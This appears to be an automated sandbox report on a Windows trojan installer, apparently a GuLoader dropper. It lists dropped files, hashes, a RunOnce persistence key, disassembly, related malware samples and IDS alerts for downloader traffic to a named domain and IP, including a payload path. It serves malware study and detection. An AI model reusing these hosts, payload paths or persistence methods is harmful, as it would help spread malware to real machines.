00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, 
      IP | Domain | Country | ASN | ASN Name | Malicious
      172.67.207.219 | gitak.top | United States | 13335 | CLOUDFLARENETUS | false
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1501093
      Start date and time:2024-08-29 12:37:38 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 13m 53s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
      Run name:Suspected Instruction Hammering
      Number of new started processes analysed:10
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:WEAREX_IHRACAT.exe
      Detection:MAL
      Classification:mal96.troj.evad.winEXE@3/10@1/1
      EGA Information:
      • Successful, ratio: 50%
      HCA Information:
      • Successful, ratio: 71%
      • Number of executed functions: 46
      • Number of non-executed functions: 31
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, UserOOBEBroker.exe, WMIADAP.exe, conhost.exe, MoUsoCoreWorker.exe, UsoClient.exe
      • Not all processes were analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtSetInformationFile calls found.
      Time | Type | Description
      12:40:17 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Aaregang C:\Users\user\AppData\Local\Temp\Pregnancy\Caterva.exe
      12:40:26 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Aaregang C:\Users\user\AppData\Local\Temp\Pregnancy\Caterva.exe
      Match: 172.67.207.219
      Associated Sample Name / URL | Detection | Threat Name | Context
      z15OrderN_24OS1275del26-08-2024_LTBLLC_.exe | malicious | GuLoader | gitak.top/ylDilrpYb69.bin
      Match: gitak.top
      Associated Sample Name / URL | Detection | Threat Name | Context
      z15OrderN_24OS1275del26-08-2024_LTBLLC_.exe | malicious | GuLoader | 172.67.207.219
      debit-note-19-08-dn-2024.exe | malicious | GuLoader | 172.67.207.219
      doc09125520240407073114.exe | malicious | FormBook, GuLoader | 104.21.22.240
      HE9306_AWBLaser_Single240812144358.exe | malicious | GuLoader | 172.67.207.219
      z41_EX24-772_24.exe | malicious | GuLoader | 172.67.207.219
      _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe | malicious | FormBook, GuLoader | 104.21.22.240
      qEW7hMvyV7.exe | malicious | FormBook | 172.67.207.219
      z9T__VAUSTRIATURK-TEKL__F.exe | malicious | FormBook, GuLoader | 104.21.22.240
      z1_____________.exe | malicious | FormBook, GuLoader | 172.67.207.219
      vV389MGvCt9jWzm.exe | malicious | Lokibot | 188.114.97.3
      Match: CLOUDFLARENETUS
      Associated Sample Name / URL | Detection | Threat Name | Context
      mU4lYkmS6K.exe | malicious | CobaltStrike | 188.114.97.3
      d3d9x.dll | malicious | LummaC | 188.114.96.3
      https://sgsconsulting.com/ | malicious | Unknown | 104.17.25.14
      Invoice.htm | malicious | HTMLPhisher | 104.17.25.14
      mU4lYkmS6K.exe | malicious | CobaltStrike | 188.114.96.3
      DHL Page1.exe | malicious | GuLoader | 104.26.12.205
      Q8qimBtTQB.dll | malicious | Metasploit | 188.114.97.3
      file.exe | malicious | Unknown | 172.64.41.3
      Upit za prevoz 28 08 2024 1037 Agrorit d.o.o.exe | malicious | AgentTesla | 172.67.74.152
      Autofill Manufacturing Sdn Bhd 28-08-2024.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      37f463bf4616ecd445d4a1937da06e19Fordybendes.exeGet hashmaliciousAzorult, GuLoaderBrowse
      • 172.67.207.219
      AyyPZaqgaZ.exeGet hashmaliciousUnknownBrowse
      • 172.67.207.219
      Requesr for quotation-sample catalog.vbsGet hashmaliciousFormBook, GuLoaderBrowse
      • 172.67.207.219
      Programa de Mentoring y Apoyo a la Internacionalizaci#U00f3n.exeGet hashmaliciousGuLoaderBrowse
      • 172.67.207.219
      Teklif Talebi.exeGet hashmaliciousGuLoaderBrowse
      • 172.67.207.219
      5649237431_23-10-23-08.49.23.0107.07.exeGet hashmaliciousGuLoaderBrowse
      • 172.67.207.219
      Estado de cuenta y facturas..exeGet hashmaliciousGuLoaderBrowse
      • 172.67.207.219
      fatura.exeGet hashmaliciousGuLoaderBrowse
      • 172.67.207.219
      227979659-051450-sanlccjavap0004-13413.exeGet hashmaliciousGuLoaderBrowse
      • 172.67.207.219
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dllsample.exeGet hashmaliciousFormBook, GuLoaderBrowse
        sample.exeGet hashmaliciousGuLoaderBrowse
          8737768___19082024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            8737768___19082024.vbsGet hashmaliciousGuLoaderBrowse
              Q8QeOUbRK0.exeGet hashmaliciousGuLoaderBrowse
                Q8QeOUbRK0.exeGet hashmaliciousGuLoaderBrowse
                  Thunderstore Mod Manager - Installer.exeGet hashmaliciousUnknownBrowse
                    Thunderstore Mod Manager - Installer.exeGet hashmaliciousUnknownBrowse
                      URYmWe54UY.exeGet hashmaliciousDCRatBrowse
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Category:dropped
                        Size (bytes):416292
                        Entropy (8bit):7.844332745869164
                        Encrypted:false
                        SSDEEP:12288:NtjALF2QGm6An6r2vvCi1JQhmlfwfmgpTxDFlvT:HYUQcAn66C+JQhml4bhx3T
                        MD5:2E620407C0B25239EF46534A34217C27
                        SHA1:1751F775E9E9279757EC94C9F4CF63B01AF42525
                        SHA-256:A49B3780D9A1AF972B0E6D252284EDFF3B00E35713336456579431F1081DEBE4
                        SHA-512:14A0898606E1B8405EDB8B790F65EE207E4FE3E1DFDC4F21C6A5014730E80CDC5BFFAF9D5AF54FC8070CC59FD4873C16A89736FD8DD7733F900A8C6D14755457
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 58%
                        Reputation:low
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):11264
                        Entropy (8bit):5.813979271513012
                        Encrypted:false
                        SSDEEP:192:eF2HS5ih/7i00dWz9T7PH6lOFcQMI5+Vw+bPFomi7dJWsP:rSUmlw9T7DmnI5+N273FP
                        MD5:7399323923E3946FE9140132AC388132
                        SHA1:728257D06C452449B1241769B459F091AABCFFC5
                        SHA-256:5A1C20A3E2E2EB182976977669F2C5D9F3104477E98F74D69D2434E79B92FDC3
                        SHA-512:D6F28BA761351F374AE007C780BE27758AEA7B9F998E2A88A542EEDE459D18700ADFFE71ABCB52B8A8C00695EFB7CCC280175B5EEB57CA9A645542EDFABB64F1
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Joe Sandbox View:
                        • Filename: sample.exe, Detection: malicious, Browse
                        • Filename: sample.exe, Detection: malicious, Browse
                        • Filename: 8737768___19082024.vbs, Detection: malicious, Browse
                        • Filename: 8737768___19082024.vbs, Detection: malicious, Browse
                        • Filename: Q8QeOUbRK0.exe, Detection: malicious, Browse
                        • Filename: Q8QeOUbRK0.exe, Detection: malicious, Browse
                        • Filename: Thunderstore Mod Manager - Installer.exe, Detection: malicious, Browse
                        • Filename: Thunderstore Mod Manager - Installer.exe, Detection: malicious, Browse
                        • Filename: URYmWe54UY.exe, Detection: malicious, Browse
                        Reputation:moderate, very likely benign file
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):745777
                        Entropy (8bit):5.134868187373461
                        Encrypted:false
                        SSDEEP:12288:cTrjMyfE4/Iv34vwEaSly2rjs2QD4bpPMwNP+qf:c1fvrCEHcqf
                        MD5:DF83E71E1F504BA452688A89CEBF2651
                        SHA1:6FF125C56A32F86EEBA91A003BCF03F3E571C355
                        SHA-256:3D5C790BC1C1A1708DD88368CC17ADC9C38FB2375D31E759373A1FCC38B47DEB
                        SHA-512:F567511563FAF0D4E5E47A1E1DA009807C8E5D8D158DE2B3BC2758C841445D9B54F2191C0755D1C2D341A69BD2F93348F645BCAB1EB87740D0D9AA147788E5BE
                        Malicious:false
                        Reputation:low
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):211920
                        Entropy (8bit):7.504741823549338
                        Encrypted:false
                        SSDEEP:3072:kalBfm7DD6XYVXaeQ9O6hE4omcKJV1ICwQYm64BoHSoQq1CIrJmbLd7:kD7DDAe2O6hE4ou1Ivm640SwEWJ+J7
                        MD5:A2F5F04E983190C0354C8362548F3AF2
                        SHA1:241D36CB0F4490E394F914CB2876A2EECDDD4F9A
                        SHA-256:915CD18120B0827AFA12CA7D9C702A61F88541EED6D896779D62BA581251D573
                        SHA-512:62A7B90AA0CFF62A6EC316D312E39E786BAEB008CEC661EE4879E181353F82AF3F9F6771C6390CE1071BE42C38667897AA1E9AF5D8B05D06DBBC21337BC449DF
                        Malicious:false
                        Reputation:low
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):459
                        Entropy (8bit):4.242630904692509
                        Encrypted:false
                        SSDEEP:6:6nW2JmgMuFGRvTrhJXVD7u0DrFSWbfAZaIkJLRH9CFeaoaTgKgXJTfC53MZUcAzK:6WsLFmjlPXFtAZULRA8VKgXQCHw791Iz
                        MD5:1459E91F25E94A3A75C331FEE10CE27B
                        SHA1:98619C367B9C295221E9D419308A7160F927566B
                        SHA-256:71F06CE6041A49F416D50E6BC6FF252D44A4829209B9778352D5F03C8120CEA0
                        SHA-512:8FC53DB6ECC6902D55EA0CAFC09201FEEBF30B95B1613489D81031DBFB27F5D222F4AE29F5868081F9F864DB11030B0DE5234CB076C672EBF038B6DF730DA459
                        Malicious:false
                        Reputation:low
                        Preview:repositioning astronavigator brskurserne emirater spegeplsen laurustinus,banco bunket prostaglandin contrate storkunderabatter,medicinalfabrikker preprocessed opstrmmes hound,polysepalous focussable foederis elida radiofrequency repressaliernes specialprogrammernes pennine lufttrykkene..degenerating lumskt overpraticed feague omarrangerer kvadratrodstegnets brutalism sequacity svingfjers krageternes..solarieudlejningerne synders centaurdom cromme romjdos.
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:ASCII text, with very long lines (65536), with no line terminators
                        Category:dropped
                        Size (bytes):443430
                        Entropy (8bit):2.6516475435571305
                        Encrypted:false
                        SSDEEP:1536:4KsgyDvUmRMEiHVKTdrWTjI4h4UK0I5ZVAmKNXUArf7bGSlFEiKEz+gNufpwX81G:LCyQi1vNbGoj28h02QD4bpPM1ONP7
                        MD5:0667E0457CC4EB7E2455A757544890F9
                        SHA1:110F026C12E0C1A53FC59424741580ADC6C1CBCA
                        SHA-256:EFF5D379FC2733E5FD0860EB112E465A364BCB19C9F0652E4CFC57DD87F739D0
                        SHA-512:A1E570E1B981E2AA8DC66D8909625E614E039E5052CE3F5C086F63F1400C45BD7DDA23E316BC1B3341AFCD8890E96F1681324C07B451821A8BEE1743D7061D5B
                        Malicious:false
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2857
                        Entropy (8bit):3.0576925960783385
                        Encrypted:false
                        SSDEEP:48:7jDlwCYXrZEulT+rBVMgyyTuSAa8MIQxxHFFTh/A:HdYXrZXSrHMgd38xQjFth/A
                        MD5:731DFA6DF00249CAC29566287712DB7E
                        SHA1:D0395A078EDEDE1FFF4B5F6921549257F9128864
                        SHA-256:1A039C58A7D2CA90AFFCF28F5ADBA163CE0E38109A8E258E28D49F5D9A5E157C
                        SHA-512:9F0586D745C8DF4F12329E34E2BF7FCC78C6725E631C760AA912BD3628955E26D56AA466009C4948CB1253839D09EC7DF6725C34A67E3B3B51670CB77AE01499
                        Malicious:false
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):22218
                        Entropy (8bit):3.264646650126842
                        Encrypted:false
                        SSDEEP:384:YtjNZ40VIDz3Wddjx2SLfNmEmvgT4mvw/PuKWxidvyQey:YxbRk3WdFxtQ9vz/PXyly
                        MD5:3FB3828F8898D364F7EE5607547E6040
                        SHA1:9EA56ECEB3D57AB5AE8D3434A157BAECF424715F
                        SHA-256:51A0A1D3B04F367EA6F0294222D49E1D351376577ACE15734340092D11391081
                        SHA-512:725671BF74696E2B502BC19352FFF96BA9E7A58064FE83EBD1D4C693DC1B7083098A26C2174FA97AA9D3C832DD119B9C6F05E585E1633FB5C7733D2983842AA0
                        Malicious:false
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):41243
                        Entropy (8bit):3.219354776148546
                        Encrypted:false
                        SSDEEP:768:u4wnuDGKamnhCdUqMxoGyTM4XPYvMiCbR3dGLq:UmAdeoJ/Y7aRtr
                        MD5:46E9E6BF651E043A929B22B6E20B22C2
                        SHA1:C2E94B4CE6F9328A063B9A6E2427ADF528735164
                        SHA-256:5A12E8D8793E33175392D0743BCE73E93F877DCB1D9933079A19ADD4161D6D97
                        SHA-512:CACED7D9F3C38B93FF91AD7B6CF4AE86FC214B446CA62D8E5BA7678EE54364D7952A50987A03CED17FCC62D4B86CF4F03DDDE0423070A4B009461C04F9428C97
                        Malicious:false
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):35
                        Entropy (8bit):3.918867931899244
                        Encrypted:false
                        SSDEEP:3:QQkJ7E4Fnyn:eA4Fnyn
                        MD5:40600272448BB9ADF1D91714A4C7A2BE
                        SHA1:E7DBF46977F456296394B6B954868EDA9AA6023F
                        SHA-256:90E93C241E8033528681E2CA698B36EF573272E920B5A0A5E900D69C258DADB4
                        SHA-512:E7002FFAB2FA38CAAC1BA7D38B4FF9DC4F7608ADEA3337C1DAF32B7F1BB299AF63AF7D172BB5B7CB90983F701BA4D3FEEAB8BDDDE06CAF028262652035D86AB5
                        Malicious:false
                        Preview:[amtstuerne]..colic=sanitetsvsnet..
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Entropy (8bit):7.844332745869164
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:WEAREX_IHRACAT.exe
                        File size:416'292 bytes
                        MD5:2e620407c0b25239ef46534a34217c27
                        SHA1:1751f775e9e9279757ec94c9f4cf63b01af42525
                        SHA256:a49b3780d9a1af972b0e6d252284edff3b00e35713336456579431f1081debe4
                        SHA512:14a0898606e1b8405edb8b790f65ee207e4fe3e1dfdc4f21c6a5014730e80cdc5bffaf9d5af54fc8070cc59fd4873c16a89736fd8dd7733f900a8c6d14755457
                        SSDEEP:12288:NtjALF2QGm6An6r2vvCi1JQhmlfwfmgpTxDFlvT:HYUQcAn66C+JQhml4bhx3T
                        TLSH:DF9412D0B7C498BAD6F35E3306F3ABB9E36ADDA50116421B37003B2E6835E51E90CB55
                        Icon Hash:076426b43c41395c
                        Entrypoint:0x403358
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        DLL Characteristics:TERMINAL_SERVER_AWARE
                        Time Stamp:0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                        Instruction
                        sub esp, 000002D4h
                        push ebx
                        push ebp
                        push esi
                        push edi
                        push 00000020h
                        xor ebp, ebp
                        pop esi
                        mov dword ptr [esp+14h], ebp
                        mov dword ptr [esp+10h], 00409230h
                        mov dword ptr [esp+1Ch], ebp
                        call dword ptr [00407034h]
                        push 00008001h
                        call dword ptr [004070BCh]
                        push ebp
                        call dword ptr [004072ACh]
                        push 00000008h
                        mov dword ptr [00429298h], eax
                        call 00007F4D90A0B83Ch
                        mov dword ptr [004291E4h], eax
                        push ebp
                        lea eax, dword ptr [esp+34h]
                        push 000002B4h
                        push eax
                        push ebp
                        push 00420690h
                        call dword ptr [0040717Ch]
                        push 0040937Ch
                        push 004281E0h
                        call 00007F4D90A0B4A7h
                        call dword ptr [00407134h]
                        mov ebx, 00434000h
                        push eax
                        push ebx
                        call 00007F4D90A0B495h
                        push ebp
                        call dword ptr [0040710Ch]
                        cmp word ptr [00434000h], 0022h
                        mov dword ptr [004291E0h], eax
                        mov eax, ebx
                        jne 00007F4D90A0898Ah
                        push 00000022h
                        mov eax, 00434002h
                        pop esi
                        push esi
                        push eax
                        call 00007F4D90A0AEE6h
                        push eax
                        call dword ptr [00407240h]
                        mov dword ptr [esp+18h], eax
                        jmp 00007F4D90A08A4Eh
                        push 00000020h
                        pop edx
                        cmp cx, dx
                        jne 00007F4D90A08989h
                        inc eax
                        inc eax
                        cmp word ptr [eax], dx
                        je 00007F4D90A0897Bh
                        add word ptr [eax], 0000h
                        Programming Language:
                        • [EXP] VC++ 6.0 SP5 build 8804
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x53000 | 0x13650 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x1000 | 0x5e66 | 0x6000 | e8f12472e91b02deb619070e6ee7f1f4 | False | 0.6566569010416666 | data | 6.419409887460116 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata | 0x7000 | 0x1354 | 0x1400 | 2222fe44ebbadbc32af32dfc9c88e48e | False | 0.4306640625 | data | 5.037511188789184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data | 0x9000 | 0x202d8 | 0x600 | a5ec1b720d350c6303a7aba8d85072bf | False | 0.4733072916666667 | data | 3.7600484096214832 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .ndata | 0x2a000 | 0x29000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc | 0x53000 | 0x13650 | 0x13800 | 8df102fbcf6a85b896cb70a1d3e0f6f4 | False | 0.81103515625 | data | 7.122865673230132 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                        RT_ICON | 0x53358 | 0xb0b7 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9877318243108822
                        RT_ICON | 0x5e410 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.34782157676348546
                        RT_ICON | 0x609b8 | 0x22a7 | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States | 0.9764400856724157
                        RT_ICON | 0x62c60 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.5522983114446529
                        RT_ICON | 0x63d08 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.48720682302771856
                        RT_ICON | 0x64bb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.6629061371841155
                        RT_ICON | 0x65458 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.3547687861271676
                        RT_ICON | 0x659c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.4530141843971631
                        RT_DIALOG | 0x65e28 | 0x100 | data | English | United States | 0.5234375
                        RT_DIALOG | 0x65f28 | 0xf8 | data | English | United States | 0.6330645161290323
                        RT_DIALOG | 0x66020 | 0xa0 | data | English | United States | 0.6125
                        RT_DIALOG | 0x660c0 | 0x60 | data | English | United States | 0.7291666666666666
                        RT_GROUP_ICON | 0x66120 | 0x76 | data | English | United States | 0.652542372881356
                        RT_VERSION | 0x66198 | 0x1ac | data | English | United States | 0.514018691588785
                        RT_MANIFEST | 0x66348 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984
                        DLL | Import
                        KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                        USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                        GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                        SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                        ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                        COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                        ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                        VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                        Language of compilation system: English
                        Country where language is spoken: United States
                        Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
                        2024-08-29T12:47:29.980026+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49817 | 443 | 192.168.11.20 | 172.67.207.219
                        2024-08-29T12:44:10.058869+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49798 | 443 | 192.168.11.20 | 172.67.207.219
                        2024-08-29T12:47:40.545730+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49818 | 443 | 192.168.11.20 | 172.67.207.219
                        2024-08-29T12:46:16.116813+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49810 | 443 | 192.168.11.20 | 172.67.207.219
                        2024-08-29T12:40:39.276679+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49778 | 443 | 192.168.11.20 | 172.67.207.219
                        2024-08-29T12:41:10.845968+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49781 | 443 | 192.168.11.20 | 172.67.207.219
                        2024-08-29T12:43:38.548806+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49795 | 443 | 192.168.11.20 | 172.67.207.219
                        2024-08-29T12:45:44.642511+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49807 | 443 | 192.168.11.20 | 172.67.207.219
                        2024-08-29T12:48:01.626916+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49820 | 443 | 192.168.11.20 | 172.67.207.219
                        2024-08-29T12:45:02.626566+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49803 | 443 | 192.168.11.20 | 172.67.207.219
                        2024-08-29T12:42:13.957536+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49787 | 443 | 192.168.11.20 | 172.67.207.219
                        2024-08-29T12:45:55.128979+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49808 | 443 | 192.168.11.20 | 172.67.207.219
                        2024-08-29T12:47:51.113817+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49819 | 443 | 192.168.11.20 | 172.67.207.219
                        2024-08-29T12:44:31.092272+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49800 | 443 | 192.168.11.20 | 172.67.207.219
                        2024-08-29T12:45:23.646662+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49805 | 443 | 192.168.11.20 | 172.67.207.219
                        2024-08-29T12:47:19.408610+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49816 | 443 | 192.168.11.20 | 172.67.207.219
                        2024-08-29T12:45:13.157708+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49804 | 443 | 192.168.11.20 | 172.67.207.219
                        2024-08-29T12:41:21.355961+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49782 | 443 | 192.168.11.20 | 172.67.207.219
